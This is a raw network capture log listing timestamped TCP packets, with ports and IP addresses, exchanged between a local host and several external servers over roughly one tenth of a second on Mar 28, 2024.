Mar 28, 2024 09:14:59.712138891 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.712182045 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.712343931 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.712387085 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.712416887 CET	80	49765	130.164.189.20	192.168.2.4
Mar 28, 2024 09:14:59.712486029 CET	49765	80	192.168.2.4	130.164.189.20
Mar 28, 2024 09:14:59.712721109 CET	49765	80	192.168.2.4	130.164.189.20
Mar 28, 2024 09:14:59.714320898 CET	80	49755	130.164.189.20	192.168.2.4
Mar 28, 2024 09:14:59.715004921 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.715059042 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.715070963 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.715106010 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.715260029 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.715342999 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.715384960 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.719044924 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.719100952 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.719105959 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.719147921 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.720312119 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.720356941 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.720402002 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.720443010 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.722778082 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.722791910 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.722839117 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.725440025 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.725455999 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.725493908 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.726535082 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.726548910 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.726589918 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.726612091 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.730199099 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.730214119 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.730258942 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.730557919 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.730571985 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.730618000 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.731618881 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:14:59.733699083 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.733715057 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.733755112 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.735663891 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.735726118 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.735753059 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.735778093 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.737221003 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.737257004 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.737281084 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.737296104 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.740648031 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.740662098 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.740710974 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.740748882 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.740787029 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.740947008 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.740997076 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.744261026 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.744277954 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.744321108 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.744338036 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.745609999 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.745623112 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.745668888 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.745692015 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.747646093 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.747662067 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.747689962 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.747719049 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.750540972 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.750555992 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.750598907 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.750624895 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.751008987 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.751022100 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.751056910 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.751075029 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.754394054 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.754424095 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.754448891 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.754467964 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.755412102 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.755429029 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.755458117 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.755482912 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.757679939 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.757715940 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.757764101 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.760315895 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.760356903 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.760369062 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.760396957 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.761106014 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.761178017 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.761188984 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.761214018 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.764343977 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.764358997 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.764386892 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.764409065 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.765090942 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.765105963 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.765140057 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.765156984 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.767616034 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.767637968 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.767659903 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.767677069 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.769603968 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.769651890 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.769671917 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.769696951 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.770819902 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.770839930 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.770884991 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.770905018 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.773984909 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.774040937 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.774045944 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.774080038 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.774238110 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.774288893 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.774324894 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.774406910 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.777129889 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.777143955 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.777264118 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.778825998 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.778839111 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.778884888 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.778923988 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.780117989 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.780158997 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.780193090 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.780231953 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.783464909 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.783493042 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.783507109 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.783520937 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.783551931 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.783581972 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.783582926 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.786652088 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.786709070 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.786710024 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.786864042 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.787918091 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.787978888 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.788001060 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.788041115 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.789263010 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.789319038 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.789354086 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.789386988 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.792197943 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.792366028 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.792406082 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.792429924 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.792488098 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.792538881 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.795149088 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.795162916 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.795223951 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.796646118 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.796710968 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.796725988 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.796765089 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.798178911 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.798191071 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.798254013 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.801018000 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.801034927 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.801045895 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.801079988 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.801125050 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.801126003 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.801161051 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.804044008 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.804058075 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.804091930 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.804126024 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.804626942 CET	80	49764	93.186.225.194	192.168.2.4
Mar 28, 2024 09:14:59.805102110 CET	80	49770	93.186.225.194	192.168.2.4
Mar 28, 2024 09:14:59.805191040 CET	49770	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:14:59.805210114 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.805277109 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.805296898 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.805331945 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.805568933 CET	49770	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:14:59.806957960 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.806977034 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.807007074 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.807029009 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.809170008 CET	80	49763	93.186.225.194	192.168.2.4
Mar 28, 2024 09:14:59.809453964 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.809467077 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.809513092 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.809721947 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.809767008 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.809786081 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.809808969 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.810806036 CET	80	49771	93.186.225.194	192.168.2.4
Mar 28, 2024 09:14:59.810887098 CET	49771	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:14:59.811172009 CET	49771	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:14:59.812527895 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.812551022 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.812642097 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.812642097 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.813664913 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.813678026 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.813716888 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.813739061 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.815315008 CET	80	49746	104.21.42.248	192.168.2.4
Mar 28, 2024 09:14:59.815371037 CET	49746	80	192.168.2.4	104.21.42.248
Mar 28, 2024 09:14:59.815376043 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.815453053 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.815470934 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.815560102 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.816250086 CET	49772	443	192.168.2.4	104.21.42.248
Mar 28, 2024 09:14:59.816296101 CET	443	49772	104.21.42.248	192.168.2.4
Mar 28, 2024 09:14:59.816351891 CET	49772	443	192.168.2.4	104.21.42.248
Mar 28, 2024 09:14:59.817676067 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.817687988 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.817745924 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.817783117 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.817814112 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.817837000 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.817856073 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.817877054 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.817909956 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.817954063 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.817990065 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.818013906 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.818074942 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.818087101 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.818121910 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.818124056 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.818147898 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.818160057 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.818161964 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.818193913 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.818213940 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.818227053 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.818252087 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.818267107 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.818289042 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.818289042 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.818329096 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.818331957 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.818341970 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.818352938 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.818371058 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.818384886 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.818399906 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.818423033 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.818433046 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.818435907 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.818459988 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.818475008 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.818598986 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.818613052 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.818624020 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.818651915 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.818659067 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.818682909 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.818708897 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.818712950 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.818747044 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.818753958 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.818810940 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.818824053 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.818852901 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.818860054 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.818872929 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.818891048 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.818895102 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.818919897 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.818922997 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.818948030 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.818953037 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.818975925 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.818990946 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.818998098 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.819005013 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.819016933 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.819029093 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.819042921 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.819055080 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.819077969 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.819112062 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.819124937 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.819135904 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.819159985 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.819165945 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.819183111 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.819196939 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.819216013 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.819216967 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.819242001 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.819253922 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.819257021 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.819273949 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.819281101 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.819298983 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.819314003 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.819339991 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.819381952 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.819427013 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.819427013 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.819441080 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.819478035 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.819488049 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.819502115 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.819524050 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.819547892 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.819571018 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.819607019 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.819758892 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.819794893 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.819852114 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.819890022 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.819896936 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.819911003 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.819921970 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.819947004 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.819973946 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.819981098 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.819993973 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.820027113 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.820044994 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.820094109 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.820132017 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.820136070 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.820161104 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.820169926 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.820199966 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.820203066 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.820213079 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.820230961 CET	80	49734	195.20.16.46	192.168.2.4
